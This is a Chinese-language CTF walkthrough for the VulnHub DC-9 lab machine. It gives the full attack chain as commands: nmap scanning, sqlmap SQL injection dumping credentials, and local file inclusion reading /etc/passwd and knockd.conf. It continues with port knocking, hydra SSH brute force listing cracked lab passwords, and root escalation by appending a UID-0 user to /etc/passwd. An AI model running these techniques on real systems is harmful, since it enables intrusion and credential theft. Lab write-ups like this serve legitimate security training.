vulnhub-dc9

靶机地址

https://www.vulnhub.com/?q=dc-

打开靶机，设置为同一种nat模式

kali 信息收集主机发现 ，并扫描该主机ip

arp-scan -l
nmap -p- -sV 192.168.1.201

访问192.168.1.201，在search界面可尝试sql注入，用burp抓包，尝试注入

使用sqlmap注入（路径自定义）

附在线破解网站：https://hashes.com/en/decrypt/hash

python sqlmap.py -r sql.txt --dbs
python sqlmap.py -r sql.txt -D users --tables
python sqlmap.py -r sql.txt -D users -T UserDetails --columns
python sqlmap.py -r sql.txt -D users -T UserDetails -C "username,password" --dump

无法登录，重新查找其他数据库，查找到admin transorbital1

python sqlmap.py -r sql.txt ‐D Staff ‐T Users ‐C Username,Password ‐‐dump

登录页面后，发现可能为文件包含漏洞，?file=…/…/…/…/etc/passwd 无有效信息，

查看knock配置文件?file=…/…/…/…/etc/knockd.conf

关于knock 讲解链接https://blog.csdn.net/nzjdsds/article/details/112476120

进行敲击，发现ssh可以连接

for x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.1.201;done

之前的用户密码分别保存，hydra爆破

hydra -L /root/桌面/1.txt -P /root/桌面/2.txt  ssh://192.168.1.201

通过ssh登录在，janitor的家目录存在secrets-for-putin的文件中存在密码

重新爆破

[22][ssh] host: 192.168.1.201   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.1.201   login: janitor   password: Ilovepeepee
[22][ssh] host: 192.168.1.201   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.201   login: fredf   password: B4-Tru3-001

ssh登录fredf，查看有root权限的文件，后发现test可以执行，执行

在上级目录查看test.py

脚本内容为将文件内容添加到另外一个文件内容

可以添加一个新的用户到/etc/passwd，然后新添加的用户登陆

Openssl来对密码进行加密,在进行编辑输入到/tmp/new-passwd，最后登录dc9，查看flag

fredf@dc-9:/opt/devstuff/dist/test$ openssl passwd -1 -salt dc9 123456
$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0:root:/bin/bash' >> /tmp/dc9
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/dc9 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su dc9